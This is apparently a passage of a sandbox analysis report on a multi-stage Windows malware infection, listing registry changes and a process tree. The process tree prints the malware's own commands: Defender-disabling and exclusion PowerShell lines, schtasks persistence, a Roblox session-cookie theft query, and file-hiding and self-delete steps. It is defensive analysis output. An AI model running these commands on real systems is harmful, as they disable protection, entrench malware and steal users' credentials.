| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\random.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\100006~1\STEALC~1.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\100006~1\STEALC~1.EXE | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE | C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Ammyy | C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Ammyy\Admin | C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Ammyy\Admin | C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Ammyy\Admin\hr3 = 4893cd9e8c781441d2a92a7b5f9b3a11bcd37e7e8b8558b059dd60b2da38f1eabdd7394eaa42eb3d1544382cfd1289e9db5f55de50061d9d0541e26e5bf6c9db8fb7162a0fcbb7c53daeac | C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\2946613613.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\SubDir\Client.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\SubDir\Client.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\SubDir\Client.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\SubDir\Client.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe
"C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe"
C:\Users\Admin\AppData\Local\Temp\3582-490\dxwebsetup.exe
"C:\Users\Admin\AppData\Local\Temp\3582-490\dxwebsetup.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\client.exe"
C:\Users\Admin\AppData\Local\Temp\Files\client.exe
C:\Users\Admin\AppData\Local\Temp\Files\client.exe
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\Client.exe"
C:\Users\Admin\AppData\Local\Temp\3582-490\Client.exe
C:\Users\Admin\AppData\Local\Temp\3582-490\Client.exe
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\plswork.exe"
C:\Users\Admin\AppData\Local\Temp\Files\plswork.exe
C:\Users\Admin\AppData\Local\Temp\Files\plswork.exe
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\Client.exe"
C:\Users\Admin\AppData\Local\Temp\3582-490\Client.exe
C:\Users\Admin\AppData\Local\Temp\3582-490\Client.exe
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "java updater" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Files\plswork.exe" /rl HIGHEST /f
C:\Windows\system32\SubDir\Client.exe
"C:\Windows\system32\SubDir\Client.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "java updater" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\winn.exe"
C:\Users\Admin\AppData\Local\Temp\Files\winn.exe
C:\Users\Admin\AppData\Local\Temp\Files\winn.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\CRYPTO~1.EXE"
C:\Users\Admin\AppData\Local\Temp\Files\CRYPTO~1.EXE
C:\Users\Admin\AppData\Local\Temp\Files\CRYPTO~1.EXE
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\soft.exe"
C:\Users\Admin\AppData\Local\Temp\Files\soft.exe
C:\Users\Admin\AppData\Local\Temp\Files\soft.exe
C:\Users\Admin\AppData\Local\Temp\Files\CRYPTO~1.EXE
C:\Users\Admin\AppData\Local\Temp\Files\CRYPTO~1.EXE
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\random.exe"
C:\Users\Admin\AppData\Local\Temp\Files\random.exe
C:\Users\Admin\AppData\Local\Temp\Files\random.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\m.exe"
C:\Users\Admin\AppData\Local\Temp\Files\m.exe
C:\Users\Admin\AppData\Local\Temp\Files\m.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe
C:\Windows\sysnldcvmr.exe
C:\Windows\sysnldcvmr.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\TROJAN~1.EXE"
C:\Users\Admin\AppData\Local\Temp\Files\TROJAN~1.EXE
C:\Users\Admin\AppData\Local\Temp\Files\TROJAN~1.EXE
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\backdoor.exe"
C:\Users\Admin\AppData\Local\Temp\Files\backdoor.exe
C:\Users\Admin\AppData\Local\Temp\Files\backdoor.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe"
C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe
C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe
C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe
"C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe" -service -lunch
C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe
"C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" Start-Sleep -Seconds 5; Remove-Item -Path 'C:\Users\Admin\AppData\Local\Temp\Files\winn.exe' -Force
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe
C:\Users\Admin\AppData\Local\Temp\2946613613.exe
C:\Users\Admin\AppData\Local\Temp\2946613613.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Windows Upgrade Manager /f
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c schtasks /delete /f /tn Windows Upgrade Manager
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe
C:\Windows\SysWOW64\reg.exe
reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Windows Upgrade Manager /f
C:\Windows\SysWOW64\schtasks.exe
schtasks /delete /f /tn Windows Upgrade Manager
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe
C:\Windows\SYSTEM32\rundll32.exe
rundll32.exe "C:\ProgramData\AMMYY\aa_nts.dll",run
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe
C:\Users\Admin\AppData\Local\Temp\248483651.exe
C:\Users\Admin\AppData\Local\Temp\248483651.exe
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
"C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe
C:\Windows\SysWOW64\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Files\TROJAN~1.EXE"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\TROJAN~1.EXE'
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100006~1\STEALC~1.EXE"
C:\Users\Admin\AppData\Local\Temp\100006~1\STEALC~1.EXE
C:\Users\Admin\AppData\Local\Temp\100006~1\STEALC~1.EXE
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100152~1\aqbjn3fl.exe"
C:\Users\Admin\AppData\Local\Temp\100152~1\aqbjn3fl.exe
C:\Users\Admin\AppData\Local\Temp\100152~1\aqbjn3fl.exe
C:\Users\Admin\AppData\Local\Temp\322341857.exe
C:\Users\Admin\AppData\Local\Temp\322341857.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Users\Admin\AppData\Local\Temp\100152~1\aqbjn3fl.exe
"C:\Users\Admin\AppData\Local\Temp\100152~1\aqbjn3fl.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\2767925072.exe
C:\Users\Admin\AppData\Local\Temp\2767925072.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\2928124777.exe
C:\Users\Admin\AppData\Local\Temp\2928124777.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100282~1\90B1CE~1.EXE"
C:\Users\Admin\AppData\Local\Temp\100282~1\90B1CE~1.EXE
C:\Users\Admin\AppData\Local\Temp\100282~1\90B1CE~1.EXE
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100301~1\AllNew.exe"
C:\Users\Admin\AppData\Local\Temp\100301~1\AllNew.exe
C:\Users\Admin\AppData\Local\Temp\100301~1\AllNew.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\SysWOW64\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\SysWOW64\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\SysWOW64\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"
C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe
C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe
C:\Windows\SysWOW64\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\lummetc.exe"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\Files\lummetc.exe
C:\Users\Admin\AppData\Local\Temp\Files\lummetc.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\3058827245.exe
C:\Users\Admin\AppData\Local\Temp\3058827245.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Files\TROJAN~1.EXE" && pause
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\SysWOW64\PING.EXE
ping localhost
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe'
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\VLC_Media.exe'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\VLC_Media.exe'
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'VLC_Media.exe'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'VLC_Media.exe'
C:\Windows\svchost.com
